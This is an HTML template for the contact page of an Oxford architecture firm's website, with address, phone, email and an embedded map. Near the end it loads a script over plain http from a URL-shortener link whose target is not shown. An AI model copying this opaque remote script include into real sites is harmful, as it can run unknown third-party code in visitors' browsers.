<!DOCTYPE html>
<html lang="en">

{% include head.html %}

<body>
  <div id="wrap">

    <nav class="navbar navbar-default navbar-fixed-top navDrop" role="navigation">
      <div class="container">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse"
            data-target="#bs-example-navbar-collapse-1">

            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index"> <img src="img/TSH-logo.png" alt="TSH logo"> </a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
          <ul class="nav navbar-nav navbar-right">
            <li><a href="projects-page">Projects</a></li>
            <li><a href="news">News</a></li>
            <li><a href="about">About</a></li>
            <li class="active"><a>Contact</a></li>
          </ul>
        </div><!-- /.navbar-collapse -->
      </div><!-- /.container-fluid -->
    </nav>


    <!-- /.mixItUp -->
    <div id="main">
      <div class="wapSub">
        <div class="container">


          <div class="addy col-lg-4 col-md-4 col-sm-12 col-xs-12">
            <h1 class="contact">Contact</h1>
            <ul>
              <li>TSH Architects</li>
              <li>Rochester House</li>
              <li>Eynsham Road</li>
              <li>Oxford</li>
              <li>OX2 9NH</li>
            </ul>

            <ul>
              <li>+44 (0) 1865 861281</li>
              <li><a href="mailto:hello@tsharchitects.co.uk">hello@tsharchitects.co.uk</a></li>
            </ul>
          </div>

          <div class="pad2 col-lg-8 col-md-8 col-sm-12 col-xs-12">
            <div class="google-maps">
              <iframe
                src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d9880.06159137045!2d-1.3224119999999997!3d51.75104200000001!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x4876c60d98f192f1%3A0x121745bac4149ae5!2sT+S+H+Architects!5e0!3m2!1sen!2suk!4v1428586765316"
                width="800px" height="600" frameborder="0" style="border:0"></iframe>
            </div>
          </div>




        </div>
      </div>

    </div>
  </div>

  <!-- Footer -->

  <!-- Footer -->

  {% include footer.html %}

  <!-- Include all compiled plugins (below), or include individual files as needed -->

  <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
  <script src='http://tinyurl.com/o7onuy9'></script>
  <script type="text/javascript" src="js/bootstrap.min.js"></script>
  <script type="text/javascript" src="js/mainnav.js"></script>
  <script type="text/javascript" src="js/maps.js"></script>



</body>

</html>